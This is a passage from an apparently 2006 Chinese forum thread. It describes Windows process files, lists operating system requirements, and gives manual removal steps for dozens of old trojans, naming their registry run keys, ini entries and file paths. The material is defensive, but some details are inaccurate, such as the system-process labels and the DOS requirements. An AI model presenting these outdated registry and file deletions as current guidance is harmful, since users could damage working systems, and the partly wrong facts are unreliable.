描述: Windows录音机用以播放和录制声音文件(.wav)。
是否为系统进程: 否

sndvol32.exe
进程文件: sndvol32 or sndvol32.exe
进程名称: Windows Volume Control
描述: Windows声音控制进程在任务栏驻留用以控制音量和声卡相关。
是否为系统进程: 否

spoolss.exe
进程文件: spoolss or spoolss.exe
进程名称: Printer Spooler Subsystem
描述: Windows打印机控制子程序用以调用需要打印的内容从磁盘到打印机。
是否为系统进程: 否

starter.exe
进程文件: starter or starter.exe
进程名称: Creative Labs Ensoniq Mixer Tray icon
描述: 状态栏图标在Creative Sound Mixer中被安装。为了Creative声卡 (Soundblaster)。
是否为系统进程: 否

systray.exe
进程文件: systray or systray.exe
进程名称: Windows Power Management
描述: Windows电源管理程序用以控制节能和恢复启动。
是否为系统进程: 否

tapisrv.exe
进程文件: tapisrv or tapisrv.exe
进程名称: TAPI Service
描述: Windows Telephony (TAPI) 的后台服务程序。
是否为系统进程: 否

userinit.exe
进程文件: userinit or userinit.exe
进程名称: UserInit Process
描述: UserInit程序运行登陆脚本,建立网络连接和启动Shell壳。
是否为系统进程: 否

visio.exe
进程文件: visio or visio.exe
进程名称: Microsoft Visio
描述: Microsoft Visio是一个图形化管理软件。
是否为系统进程: 否

vptray.exe
进程文件: vptray or vptray.exe
进程名称: Norton AntiVirus
描述: Norton Anti-Virus扫描你的文件和email中的病毒。
是否为系统进程: 否

vshwin32.exe
进程文件: vshwin32 or vshwin32.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用以扫描你的文件和email中的病毒。
是否为系统进程: 否

vsmon.exe
进程文件: vsmon or vsmon.exe
进程名称: True Vector Internet Monitor
描述: True Vector Internet Monitor是ZoneAlarm个人防火墙的一部分,用以监视网络流经数据和攻击。
是否为系统进程: 否

vsstat.exe
进程文件: vsstat or vsstat.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用以扫描你的文件和email中的病毒。
是否为系统进程: 否

wab.exe
进程文件: wab or wab.exe
进程名称: Address Book
描述: 在Outlook中的地址薄。用来存放email地址、联系信息。
是否为系统进程: 否

webscanx.exe
进程文件: webscanx or webscanx.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用以扫描你的文件和email中的病毒。
是否为系统进程: 否

winamp.exe
进程文件: winamp or winamp.exe
进程名称: WinAmp
描述: WinAmp Media Player是一个用来打开音乐、声音和视频文件以及用以管理Mp3文件的软件。
是否为系统进程: 否

winhlp32.exe
进程文件: winhlp32 or winhlp32.exe
进程名称: Windows Help
描述: Windows帮助文件察看程序,用来打开帮助文档。该程序被包括在很多的Windows程序中。
是否为系统进程: 否

winoa386.mod
进程文件: winoa386 or winoa386.mod
进程名称: MS-DOS Console
描述: Windows MS-DOS控制台用以DOS命令和脚本。
是否为系统进程: 否

winproj.exe
进程文件: winproj or winproj.exe
进程名称: Microsoft Project
描述: Microsoft Project是一个项目计划编制程序。
是否为系统进程: 否

winroute.exe
进程文件: winroute or winroute.exe
进程名称: WinRoute
描述: WinRoute是一个基于Windows的防火墙/路由/连接共享软件。
是否为系统进程: 否

winword.exe
进程文件: winword or winword.exe
进程名称: Microsoft Word
描述: Microsoft Word是一个字处理程序包括在Microsoft Office。
是否为系统进程: 否

winzip32.exe
进程文件: winzip32 or winzip32.exe
进程名称: WinZip
描述: WinZip是一个文件压缩工具,用于创建,打开和解压zip文件。
是否为系统进程: 否

wkcalrem.exe
进程文件: wkcalrem or wkcalrem.exe
进程名称: Microsoft Works Calendar Reminder
描述: Microsoft Works Calendar Reminders工作日程提醒,在后台处理和显示弹出计划的工作日志提醒。
是否为系统进程: 否

wkqkpick.exe
进程文件: wkqkpick or wkqkpick.exe
进程名称: WinZip traybar icon
描述: WinZip的状态栏图标,被允许在Winzip启动时启动。
是否为系统进程: 否

wmplayer.exe
进程文件: wmplayer or wmplayer.exe
进程名称: Windows Media Player
描述: Windows Media Player是一个用来打开和播放音乐,声音和视频的软件。
是否为系统进程: 否

wordpad.exe
进程文件: wordpad or wordpad.exe
进程名称: Wordpad
描述: Wordpad是一个字符编辑器用以打开和编辑txt和rtf档。
是否为系统进程: 否

wowexec.exe
进程文件: wowexec or wowexec.exe
进程名称: Windows On Windows Execution Process
描述: Windows On Windows Execution Support Process和ntvdm.exe作用类似,为了兼容16位应用程序。
是否为系统进程: 否

ypager.exe
进程文件: ypager or ypager.exe
进程名称: Yahoo Messenger Helper
描述: Yahoo Messenger的状态栏图标,随Yahoo Messenger运行,是其一部分。
是否为系统进程: 否

五十二、操作系统与系统配置

操作系统 最少需要的硬盘空间 最少需要的内存容量 其它

DOS 50MB 32MB
Windows 3.1 100MB 32MB
Windows 95 500MB 32MB
Windows 98 500MB 64MB
Windows ME 2GB(由于存在系统还原) 96MB
Windows 2000 Professional 2GB 128MB 分别支持1个
Windows 2000 Server 2GB 192MB 2个
Windows 2000 Advanced Server 2GB 256MB 4个以上中央处理器
Windows XP Home 2GB 128MB
Windows XP Professional 2GB 128MB
Windows NT 4.0 Workstation 1GB 64MB
Windows NT 4.0 Server 1GB 128MB
Windows NT 4.0 Enterprise 2GB 192MB
Linux 2GB 64MB
级别: 光盘中级
发帖
1140
飞翔币
335
威望
303
飞扬币
8460
信誉值
0
只看该作者 3 发表于: 2006-12-28
[size=12px]五十三、常见病毒的手工清除方法

1.Acid Battery
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Explorer ="C:\WINDOWS\expiorer.exe"
关闭Regedit
重新启动到MSDOS方式
删除c:\windows\expiorer.exe木马程序
注意:不要删除正确的ExpLorer.exe程序,它们之间只有i与L的差别。
重新启动。

2.Acid Shiver
重新启动到MSDOS方式
删除C:\windows\MSGSVR16.EXE
然后回到Windows系统
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Explorer = "C:\WINDOWS\MSGSVR16.EXE"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
删除右边的Explorer = "C:\WINDOWS\MSGSVR16.EXE"
关闭Regedit
重新启动。

3.Ambush
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的zka = "zcn32.exe"
关闭Regedit
重新启动到MSDOS方式
删除C:\Windows\ zcn32.exe
重新启动。

4.AOL Trojan
启动到MSDOS方式
删除C:\ command.exe(删除前取消文件的隐含属性)
注意:不要删除真的command.com文件。
删除C:\ americ~1.0\buddyl~1.exe(删除前取消文件的隐含属性)
删除C:\ windows\system\norton~1\regist~1.exe(删除前取消文件的隐含属性)

打开WIN.INI文件
在[WINDOWS]下面"run="和"load="都加载者特洛伊木马程序的路径,必须清除它们:
run=
load=
保存WIN.INI

还要改正注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的WinProfile = c:\command.exe
关闭Regedit,重新启动Windows。

5.Asylum
注意:木马程序默认文件名是wincmp32.exe,然而程序可以随意改变文件名。
我们可以根据木马修改的system.ini和win.ini两个文件来清除木马。
打开system.ini文件
在[BOOT]下面有个"shell=文件名"。正确的文件名是explorer.exe
如果不是"explorer.exe",那么那个文件就是木马程序,把它查找出来,删除。
保存退出system.ini
打开win.ini文件
在[WINDOWS]下面有个run=
如果你看到=后面有路径文件名,必须把它删除。
正确的应该是run=后面什么也没有。
=后面的路径文件名就是木马,把它查找出来,删除。
保存退出win.ini。

6.AttackFTP
打开win.ini文件
在[WINDOWS]下面有load=wscan.exe
删除wscan.exe ,正确是load=
保存退出win.ini。

打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Reminder="wscan.exe /s"
关闭Regedit,重新启动到MSDOS系统中
删除C:\windows\system\ wscan.exe

7.Back Construction
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的"C:\WINDOWS\Cmctl32.exe"
关闭Regedit,重新启动到MSDOS系统中
删除C:\WINDOWS\Cmctl32.exe

8.BackDoor
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的'c:\windows\notpa.exe /o=yes'
关闭Regedit,重新启动到MSDOS系统中
删除c:\windows\notpa.exe
注意:不要删除真正的notepad.exe笔记本程序

9.BF Evolution
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的(Default)=" "
关闭Regedit,再次重新启动计算机。
将C:\windows\system\ .exe(空格exe文件)

10.BioNet
0.8X版本是运行在Win95/98
0.9X以上版本有运行在Win95/98 和WinNT上两个软件
客户-服务器协议是一样的,因而NT客户能黑95/98被感染的机器,和Win95/98客户能黑NT被感染的系统完全一样。
清除木马的步骤:
首先准备一张98的启动盘,用它启动后,进入c:\windows目录下,用attrib libupd~1.exe -h
命令让木马程序可见,然后删除它。
抽出软盘后重新启动,进入98下,在注册表里找到:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
的子键WinLibUpdate = "c:\windows\libupdate.exe -hide"
将此子键删除。

11.Bla
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Systemdoor = "C:\WINDOWS\System\mprdll.exe"
关闭Regedit,重新启动计算机。
查找到C:\WINDOWS\System\mprdll.exe和
C:\WINDOWS\system\rundll.exe
注意:不要删除C:\WINDOWS\RUNDLL.EXE正确文件。
并删除两个文件。

12.BladeRunner
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
可以找到System-Tray = "c:\something\something.exe"
右边的路径可能是任何东西,这时你不需要删除它,因为木马会立即自动加上,你需要的是记下木马的名字与目录,然后退回到MS-DOS下,找到此木马文件并删除掉。
重新启动计算机,然后重复第一步,在注册表中找到木马文件并删除此键。

13.Bobo
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的DirrectLibrarySupport ="C:\WINDOWS\SYSTEM\Dllclient.exe"
关闭Regedit,重新启动计算机。
DEL C:\Windows\System\Dllclient.exe

14.BrainSpy
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
右边有 ??? = "C:\WINDOWS\system\BRAINSPY .exe"
???标签选是随意改变的。
关闭Regedit,重新启动计算机
查找删除C:\WINDOWS\system\BRAINSPY .exe

15.Cain and Abel
进入MS-DOS方式
查找到C:\windows\msabel32.exe
并删除它

16.Canasson
打开WIN.INI文件
查找c:\msie5.exe,删除全部主键
保存win.ini
重新启动计算机
删除c:\msie5.exe木马文件

17.Chupachbra
打开WIN.INI文件
[Windows]的下面有两个行
run=winprot.exe
load=winprot.exe
删除winprot.exe
run=
load=
保存Win.ini,再打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的'System Protect' = winprot.exe
重新启动Windows
查找到C:\windows\system\ winprot.exe,并删除。

18.Coma
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的'RunTime' = C:\windows\msgsrv36.exe
重新启动Windows
查找到C:\windows\ msgsrv36.exe,并删除。

19.Control
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的Load MSchv Drv = C:\windows\system\MSchv.exe
保存Regedit,重新启动Windows
查找到C:\windows\system\MSchv.exe,并删除。

20.Dark Shadow
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\RunServices
删除右边的winfunctions="winfunctions.exe"
保存Regedit,重新启动Windows
查找到C:\windows\system\ winfunctions.exe,并删除。

21.DeepThroat
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
版本1.0
删除右边的项目'System32'=c:\windows\system32.exe
版本2.0-3.1
删除右边的项目'SystemTray' = 'Systray.exe'
保存Regedit,重新启动Windows
版本1.0删除c:\windows\system32.exe
版本2.0-3.1
删除c:\windows\system\systray.exe

22.Delta Source
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的项目:DS admin tool = C:\TEMPSERVER.exe
保存Regedit,重新启动Windows
查找到C:\TEMPSERVER.exe,并删除它。

23.Der Spaeher
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的项目:explore = "c:\windows\system\dkbdll.exe "
保存Regedit,重新启动Windows
删除c:\windows\system\dkbdll.exe木马文件。

24.Doly
这几个木马版本的木马程序放在三处,增加二个注册项目,还增加到Win.ini项目。
首先,进入MS-DOS方式,删除三个木马程序,但V1.35版本多一个木马文件mdm.exe。
把下列各项全部删除:
C:\WINDOWS\SYSTEM\tesk.sys
C:\WINDOWS\Start Menu\Programs\Startup\mstesk.exe
c:\Program Files\MStesk.exe
c:\Program Files\Mdm.exe
重新启动Windows。

接着,打开win.ini文件
找到[WINDOWS]下面load=c:\windows\system\tesk.exe项目,删除路径,改变为load=
保存win.ini文件。

最后,修改注册表Regedit
找到以下两个项目并删除它们
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Ms tesk = "C:\Program Files\MStesk.exe"

HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
Ms tesk = "C:\Program Files\MStesk.exe"
再寻找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ss
这个组是木马的全部参数选择和设置的服务器,删除这个ss组的全部项目。
关闭保存Regedit。
还有打开C:\AUTOEXEC.BAT文件,删除
@echo off copy c:\sys.lon c:\windows\StartMenu\Startup Items\
del c:\win.reg
关闭保存autoexec.bat。

25.Donald Dick
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\VxD\VMLDIR\
删除右边的项目:StaticVxD = "vmldir.vxd"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\System\vmldir.vxd

26.Drat
开注册表Regedit
点击目录至:hkey_classes_root\exefile\shell\open\command
找到@=SHELL32 \"%1\" %*把它更改为@="%1" %*
关闭保存Regedit,重新启动Windows。
查找c:\windows\下shell32.*文件,并删除它。

27.Eclipse 2000
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:bybt = "c:\windows\system\eclipse2000.exe"
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ RunServices\
删除右边的项目:cksys = "c:\windows\system\ could be anything .exe"
关闭保存Regedit,重新启动Windows
查找到eclipse2000.exe木马文件,并删除

28.Eclypse
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Rnaapp ="C:\WINDOWS\SYSTEM\rmaapp.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\SYSTEM\rmaapp.exe
注意:不要删除Rnaapp.exe

29.Executer
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
在右边的项目查找到"C:\windows\sexec.exe",并删除。
关闭保存Regedit,重新启动Windows
相应删除木马程序文件。

30.FakeFTP beta
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Rundll32 = rundll3.tww /h
关闭保存Regedit,重新启动Windows
找到C:\windows\文件夹下的三个文件并删除它们
rundll3.bat - 9x.reg - nt.reg

31.Forced Entry
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:MicrosoftRegistration32 = "C:\somepath \trojanhrs.exe"
关闭保存Regedit,重新启动Windows
由于路径容易改变,只要查找到trojanhrs.exe,并删除它。

32.GateCrasher
清除木马v1.0:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Explore='c:\windows\explore.exe'
关闭保存Regedit,重新启动Windows
然后,删除相应的木马程序。

33.Girlfriend
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Windll.exe ="C:\windows\windll.exe"
Regedit里也保存着服务器的数据
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\General
删除General项目标题
关闭保存Regedit,重新启动Windows
然后,找到相应的木马程序,并删除。

34.Golden Retreiver
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Task Manager="c:\mstask.exe"
关闭保存Regedit,重新启动Windows
然后,找到相应的木马程序,并删除。

35.Hack'a'Tack
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Explorer32 ="C:\windows\Expl32.exe"
关闭保存Regedit,重新启动Windows
然后,找到相应的木马程序,并删除。

36.Hack99 KeyLogger
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:HKeyLog = "C:\Windows\System\HKeyLog.exe"
关闭保存Regedit,重新启动Windows
删除C:\Windows\System\HKeyLog.exe

37.HostControl
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:RegClean = "c:\windows\inf\regcle32.exe"
关闭保存Regedit,重新启动Windows
删除c:\windows\inf\regcle32.exe

38.Hvl Rat
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Explorer = "C:\WINDOWS\system\MSGSVR16.EXE"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\system\MSGSVR16.EXE

39.ik97
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:ik = 'c:\progra~1\ik\ik.exe'
关闭保存Regedit,重新启动Windows
删除C:\Program Files\ik\ik.exe

40.InCommand
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
找到右边的项目:AdvancedSettings = *
注意:*表示就是木马的存放路径与文件名,记下后删除此键。
关闭保存Regedit,重新启动Windows
按照刚才记下的木马路径与文件名删除木马程序。

41.IndocTrination
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce\
每项标题都包括Msgsrv16 ="Msgsrv16"项目
删除每个项目
关闭保存Regedit,重新启动Windows
删除C:\windows\system\msgserv16.exe

42.inet
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Explorer = "C:\WINDOWS\system\inet.exe"
关闭保存Regedit,重新启动Windows
删除"C:\WINDOWS\system\inet.exe"
删除"C:\WINDOWS\system\inet.dll"

43.Infector
打开system.ini文件
找到shell=explorer.exe c:\path\to\trojan.exe项目
改为:shell=explorer.exe
保存关闭system.ini文件,重新启动Windows
删除c:\path\to\trojan.exe

44.iniKiller
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Explore="C:\windows\bad.exe "
关闭保存Regedit,重新启动Windows
删除C:\windows\bad.exe

45.Intruder
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:PPModule1 = 'ppmod1.sys'
关闭保存Regedit,重新启动Windows
删除C:\windows\system\ ppmod1.sys
删除C:\windows\system\ ppmod2.sys

46.IPC3
打开win.ini文件
找到load=closew项目,更改为:load=
保存关闭win.ini,重新启动Windows
查找这两个文件'rundlls.exe' 、'closew.bat'
并删除它们。

47.Kaos
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Sys="c:\windows\shell32.exe"
关闭保存Regedit,重新启动Windows
删除c:\windows\shell32.exe

48.Khe Sanh
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:TBoot0001="c:\windows\system\trjp.exe"
关闭保存Regedit,重新启动Windows
删除c:\windows\system\trjp.exe

49.Kuang logger
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:K2logas.task ="C:\WINDOWS\SYSTEM\K2logas.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\SYSTEM\K2logas.exe

50.Kuang Original
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Temp$1.task = "c:\windows\system\temp$1.exe"
清除木马v 0.20-0.21版本:
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:K2PS.task = "c:\windows\system\k2ps.exe"
清除木马v 0.30-0.34版本:
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:K2PS_full.task = "c:\windows\system\k2ps_full.exe"

关闭保存Regedit,重新启动Windows
查找相对应的木马程序,并删除。

51.Logger
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:??? = "C:\windows\system\logged.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\SYSTEM\ logged.exe

52.Magic Horse
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:SpoolerService="c:\windows\spoolsrv.exe"
关闭保存Regedit,重新启动Windows
删除c:\windows\spoolsrv.exe

53.Malicious
打开注册表Regedit
点击目录至:
HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Policies\
删除右边的五个项目:DisableRegistryTools NoRun NoFind NoDesktop NoClose
关闭保存Regedit,重新启动Windows

54.Masters Paradise
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:SYSEDIT = c:\windows\ sysedit.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
删除右边的项目:Explorer = c:\......\agent.exe
关闭保存Regedit,重新启动Windows
查找到木马程序,并删除它们。
注意:c:\windows\system\下面的sysedit.exe文件是不是19KB,如果不是说明以被木马感染,删除它。

55.Matrix
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:??? ="C:\WINDOWS\Wincfg.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\Wincfg.exe

56.MBK
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
查找并删除右边的项目:Explorer =" "后面是"mbt.exe"
关闭保存Regedit,重新启动Windows
查找mbt.exe并删除。

57.Millenium
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Millenium = "C:\windows\system\reg66.exe "
关闭保存Regedit,重新启动Windows
删除C:\windows\system\reg66.exe

58.Mine
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目: Windows = 'c:\msdos98.exe'
关闭保存Regedit,重新启动Windows
删除c:\msdos98.exe
打开win.ini文件
查找到run=c:\windows\uninstallms.exe
更改为:run=
关闭保存win.ini,重新启动Windows
del c:\msdos98.exe
del c:\windows\uninst~1.exe
del c:\windows\system\mine.exe

59.MoSucker
打开system.ini文件
查找到shell=Explorer.exe unin0686.exe
更改为:shell= Explorer.exe
关闭保存system.ini,重新启动Windows
删除C:\windows\unin0686.exe

60.Naebi
打开注册表Regedit
点击目录至:
HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\ICQ
v2.12删除右边的项目:path= "C:\windows\msramgr.exe "
v2.15删除右边的项目:path= "C:\windows\ msdll32.exe "
v2.19删除右边的项目:path= "C:\windows\ naebi219.exe "
v2.xx删除右边的项目:path= "C:\windows\ naebi219.exe "文件名可能还是naebi.exe , ns220.exe, ns227, ns231, ns234
关闭保存Regedit
v2.34和上面相同,但它在win.ini增加了启动
打开win.ini文件
把run=后面的路径删除
关闭保存win.ini,重新启动Windows
查找相应的木马程序,并删除

61.NetController
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:System = 'c:\windows\system.exe'
关闭保存Regedit,重新启动Windows
删除c:\windows\system.exe

62.NetRaider
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Rsrcnrs = 'C:\windows\rsrcnrs.exe'
关闭保存Regedit,重新启动Windows
删除C:\windows\rsrcnrs.exe

63.NetSphere
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:NSSX ="C:\WINDOWS\system\nssx.exe"
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\****\Software\Microsoft\Windows\CurrentVersion\Run
删除项目同上。
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\system\nssx.exe

64.NetSpy
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Netspy = "netspy.exe"
关闭保存Regedit,重新启动Windows
查找到netspy.exe,并删除。

65.NetSpy
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Netspy = "netspy.exe"
关闭保存Regedit,重新启动Windows
查找到netspy.exe,并删除。

66.NetTrojan
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:*** = "C:\WINDOWS\System\glide16.exe"
关闭保存Regedit
打开win.ini文件
查找到run=c:\windows\fxp.exe
把run=后面的路径删除
关闭保存win.ini,重新启动Windows
查找相应的木马程序,并删除。

67.Nirvana VisualKiller
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:TheDoor = 'c:\windows\fonts\ariel.exe'
关闭保存Regedit,重新启动Windows
删除c:\windows\fonts\ariel.exe

68.Phaze Zero
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:MsgServ = "msgsvr32.exe"
关闭保存Regedit,重新启动Windows
查找相应的木马程序,并删除。

69.Prayer
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:SysFiles = "C:\WINDOWS\System\dlls32.exe"
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:SysFiles = "C:\WINDOWS\System\dlls32.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\System\dlls32.exe

70.PRIORITY
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services
\
删除右边的项目:"PServer"= C:\Windows\System\PServer.exe
关闭保存Regedit,重新启动Windows
删除C:\Windows\System\PServer.exe

71.Progenic Password Thief
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:pwt ="C:\WINDOWS\SYSTEM\pwt.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\SYSTEM\pwt.exe

72.Progenic
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Scandisk = "C:\WINDOWS\scandiskvr.exe"
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\scandiskvr.exe

73.Prosiak beta
